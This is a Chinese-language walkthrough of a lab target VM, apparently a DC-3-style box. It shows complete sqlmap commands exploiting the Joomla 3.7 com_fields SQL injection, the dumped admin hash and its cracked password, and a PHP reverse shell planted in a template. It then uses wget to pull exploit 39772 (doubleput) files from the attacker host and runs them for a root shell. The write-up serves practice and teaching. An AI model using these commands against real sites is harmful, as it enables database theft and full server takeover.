今后的靶机渗透,我尽量简单化,一些繁琐的过程我就不写出来了
直接写主要的步骤和想法思路
靶机IP:192.168.56.101
web渗透
http://192.168.56.101/administrator
发现是joomla建站
不想爆破了,发现了暴露出该cms的版本信息
http://192.168.56.101/README.txt
image.png
sql注入
不想盲测,直接上kali中search一下poc
searchsploit joomla 3.7
image.png
判断出有注入点,且注入点已知。直接跑跑sqlmap
注入语句:
1、爆库
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
image.png
2、爆表
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
image.png
3、爆字段数据
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]
image.png
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C 'username,password' --dump -p list[fullorde
ring]
image.png
拿到了admin用户的密码hash
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
拿去md5解不出来,试试john爆解
john解hash
john hash
image.png
登录后台试试,成功登录
口令是:
admin snoopy
后台反弹getshell
进入后台后,选择Templates模板,选择templates第一个模板即可,在index.php页面中添加php反弹马
image.png
kali中开启监听
image.png
反弹成功
提权
先查看下该靶机的系统版本信息
image.png
老系统,也许有漏洞
随便拿一个试试
image.png
这个不行,再试试下一个
试了几个,发现这个可以
image.png
下载到靶机上
image.png
wget http://192.168.56.102/39772/compile.sh
wget http://192.168.56.102/39772/doubleput.c
wget http://192.168.56.102/39772/hello.crm
wget http://192.168.56.102/39772/suidhelper.c
之后
./compile.sh
./doubleput
拿到root权限
image.png
get flag
image.png
总结
1、发现了cms建站,注意版本等信息,可以直接找cms漏洞
2、进入后台,joomla直接上反弹马getshell
3、提权就比较难了,也是参照 国外的大牛的方法
靶机百度云下载
链接:https://pan.baidu.com/s/1al4ls7lx8zVq6s--Ik3RcQ
提取码:lbi4
网友评论